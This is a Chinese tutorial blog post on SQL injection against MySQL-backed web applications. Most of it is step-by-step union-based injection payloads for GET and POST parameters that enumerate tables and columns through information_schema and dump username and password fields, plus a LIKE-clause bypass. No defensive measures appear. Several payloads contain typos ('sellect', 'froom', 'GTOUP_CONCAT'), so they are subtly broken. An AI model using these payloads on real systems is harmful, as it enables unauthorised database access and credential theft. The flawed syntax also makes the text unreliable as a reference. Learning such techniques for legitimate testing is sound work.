SQL渗透与防御——(二)SQL注入

已于 2022-03-04 15:59:15 修改
阅读量4k 收藏 3
点赞数 1
分类专栏: # SQL 文章标签: 数据库 mysql java
于 2022-02-27 11:58:04 首次发布
本文博主FisrtBqy。文章内容仅供学习交流,未经允许请勿用于论文写作、竞赛答辩、书刊出版、商业活动等。如有问题请联系作者:FisrtBqy@163.com
本文链接:https://blog.csdn.net/FisrtBqy/article/details/123161950
版权

第二章 SQL注入

1.SQL注入基础

1. MySQL Base

系统库释意

  • Information_schema库:是信息数据库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息,比如数据库名,数据库表,表字段的数据类型与访问权限等。
  • SCHEMATA表:提供了当前MySQL实例中所有的数据库信息,show database结果取之此表。
  • TABLES表:提供了关于数据中表的信息。
  • COLUMNS表:详细描述了某张表所有列的信息。
  • mysql库:MySQL的核心数据库,主要负责存储数据库的用户、权限设置、关键字等mysql控制和管理信息。
  • performance_schema库:内存数据库,数据放在内存中直接操作的数据库,相对于磁盘,内存的数据读写速度要高出几个数量级。
  • sys库:调用这个数据库数据库,可以查询谁使用了最多的资源基于IP或是用户,哪张表被访问过最多等信息。

2.SQL Injection

  1. web程序三层架构:

    界面层:用户与前端交互

    业务逻辑层:前后端交互

    数据访问层:后端与数据库交互 SQL注入发生处

  2. 简易原理
    在这里插入图片描述 在这里插入图片描述
    SELECT * FROM t1 WHERE ID=%s;
    SELECT * FROM t1 WHERE name=%s;
    假设用户传入的ID或name值为真,比如***1 or 1 = 1***则……产生注入
    实际上执行的SQL语句为:SELECT * FROM t1 WHERE id=1 OR 1=1;
    注意闭合单引号和注释掉后面语句。

  3. 基础语法
    SQL语法

2.GET类型

union联合查询注入

  • 134 ' union select 1,2,3,4 -- 最后有空格,注释掉源码中后面的语句
    其中1,2,3,4由SQL字段个数决定,可以直接或由134' order by 4 --试出。

  • 134' union sellect 1,user(),version(),database() --替换其中的字段为user()、database()之类的,注意数据类型(对应位置字段替换前后数据类型要一致)。

  • 134' union select 1,database(),table_name,4 from information_schema.tables where table_schema=database() --
    利用information_schema库中的tables来查询database()库中存在的表名。

  • 134' union select 1,database(),column_name,4 from information_schema.columns where table_name='user' and table_schema=database() --
    利用information_schema库中的columns来查询database()库中存在的表(例如user)中的字段名。

  • 134' union select 1,username,passwd,4 froom user --
    利用查询到的字段名(例如username,passwd)替换起初union查询语句,得到值。

  • 获取table_name
    获取column_name
    database
    tables
    columns
    username
    password

3.POST类型

注意看页面源码,筛查有用信息。

Request Method:POST
Form Data(参数)
	movie:1
	action:go
两个参数即为注入点

在这里插入图片描述在这里插入图片描述

  1. 如果源码语句只显示一条结果,则先使原参数值为数据库中不存在的值,例如movie取值1~10,这里使其为11;

  2. 然后使用GROUP_CONCAT()函数:

    11 union select 1,user(),database(),4GTOUP_CONCAT(table_name),6,7 from information_schema.tables where table_schema=database() --

在这里插入图片描述
找到需要的表名,如users;

  1. 11 union select 1,user(),database(),4GTOUP_CONCAT(column_name),6,7 from information_schema.columns where table_name='users' --
    在这里插入图片描述
  2. 11 union select 1,GROUP_CONCAT(login),GROUP_CONCAT(password),4GTOUP_CONCAT(table_name),GROUP_CONCAT(admin),7 from users --

  • like

    如果用a' or '1'='1无果,则源码可能是用了like

    like %book	//以book开头的值
like book%	//以book结尾的值
like %book%	//包含book的值

    在这里插入图片描述
    那么需要闭合%
    a%' or '1'='1' --

FisrtBqy
关注
专栏目录
SQL注入漏洞的检测及防御方法
leyang0910的博客
12-07 677
SQL注入是一种攻击技术,攻击者通过在输入字段中插入恶意SQL代码,试图欺骗应用程序以执行不安全的数据库操作。这些恶意SQL代码将与应用程序的数据库进行交互,允许攻击者执行未授权的操作。SQL注入攻击通常针对使用动态SQL查询的Web应用程序,这些查询构建在未正确过滤或验证用户输入的基础上。SQL注入攻击通常涉及使用单引号、双引号、注释符号和逻辑运算符等特殊字符,以绕过应用程序的输入验证,构造恶意SQL查询。成功的攻击可能导致数据库泄漏、数据破坏、未授权访问、甚至完整的数据库服务器控制。
SQL注入渗透防御(一)什么是SQL注入
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-18 314
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 。 ​
SQL注入渗透防御
yk2909438315的博客
07-10 2501
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。web应用程序:移动端的app或PC端的网站网页。
SQL 注入防护+Web 应用防火墙》
最新发布
jiyiwangluokeji的博客
10-06 707
这只是一些基本的配置示例,实际的配置需要根据您的服务器架构、应用类型和具体需求进行调整和优化。Web 应用防火墙(以 ModSecurity 为例)输入验证(以 Python 的 Flask 框架为例)// 假设从用户获取的输入为 $userInput。SQL 注入防护(以 MySQL 数据库为例)# 只允许字母、数字和空格。// 使用参数化查询。
简单的SQL渗透
shupianbenben的博客
09-13 447
SQL注入靶场
渗透测试之SQL注入
CheatMyself的博客
06-25 2301
按照攻击类型分为:联合查询注入、布尔注入、时间延迟注入、报错型注入、堆叠型注入等按照注入位置分为:HTTP头注入、请求参数注入等按照数据库场景分为:MySQL注入、MSSQL注入、Oracle场景注入。
学习信安的渗透知识之--SQL注入渗透与攻防(
weixin_54975329的博客
06-06 173
SQL注入
灵活地运用SQL Injection做数据库渗透
06-12 735
文章作者:cawan信息来源:邪恶八进制安全小组如何灵活地运用SQL Injection做数据库渗透的一种思路如今,很多关于mssql数据库渗透技巧已不能有效地获取有用的数据值。比如在一个怀疑是注入点的地方 www.xxxxx.com/blog.asp?id=4当加入" "符号进行注入测试时,www.xxxxx.com/blog.asp?id=4出错信息是,[Microsoft][ODBC
手把手教你用Python轻松玩转SQL注入——渗透利器
pyjishu的博客
03-25 2277
前言 大家好,我是黄伟。相信大家经常有听到过SQL注入啥的,但是并不是特别了解;小编以前就是经常听别人说,但是自己啥都不懂,直到后来看了相关教材后才明白,原来是这么个东西,那么到底是什么东西了,又或者是不是个东西了?我们接着往下看。 一、浅谈SQL注入 SQL注入其实就是把SQL命令插入到WEB表单中提交或者输入一些页面请求的查询字符串,比如我们输网址,就是相当于这种操作,只不过我们不是在测试SQL注入漏洞,而仅仅只是为了输入后看到相应网页上的内容而已。一般方法有,如:猜数据表名,其次就是绕过后.
《OWASP代码审计》学习——SQL注入漏洞审计
PICACHU+++的博客
08-04 653
注入攻击允许恶意用户向应用程序添加或注入内容和命令,以修改其行为。这些类型的攻击是常见且广泛的,黑客很容易测试网站是否易受攻击,攻击者也很容易利用这些攻击。如今,它们在尚未更新的遗留应用程序中非常常见。
记一次我的漏洞挖掘实战——某公司的SQL注入漏洞
PICACHU+++的博客
05-02 5183
我是在漏洞盒子上提交的漏洞,上面有一个项目叫做公益SRC。公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。SQL注入防御方法很多,也是老生常谈的问题。
渗透入侵\超级SQL注入工具 SSQLInjection V1.0.zip
07-15
超级SQL注入工具 SSQLInjection V1.0
详解强大的SQL注入工具——SQLMAP
05-09
SQLMAP是一个开源的渗透测试工具,专门用于自动探测和利用SQL注入漏洞。SQLMAP不仅可以在Windows平台上使用,同时也支持Linux平台,它的设计目标是为了帮助数据库管理员(DBA)和安全研究人员检测数据库配置的安全性...
SQL注入详解(第一章基础入门)
m0_52051132的博客
09-17 476
数据库就是一个存储数据的仓库,数据库是以一定方式存储在一起,能与多个用户共享,具有尽可能小的冗余,与应用程序彼此独立的数据集合。
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3164
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
SQL注入——渗透day06
qq_62716256的博客
08-12 1033
SQL注入——渗透day06
[渗透&攻防] 一.从数据库原理学习网络攻防及防止SQL注入
jennycisp的博客
04-08 1036
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方维码免费领取🆓👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享**(安全链接,放心点击)**👈。
SQL注入攻击与防御
qq_49314076的博客
12-19 4190
SQL注入攻击与防御
SQL注入详解:原理、攻击手段及防御策略
fudaihb的博客
07-16 2394
SQL注入SQL Injection)是Web应用程序安全中最常见和最严重的漏洞之一。攻击者通过将恶意SQL代码插入输入字段,欺骗应用程序执行未授权的SQL命令,从而访问、篡改或删除数据库中的敏感数据。本文将深入探讨SQL注入的原理、常见攻击手段及其防御策略。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值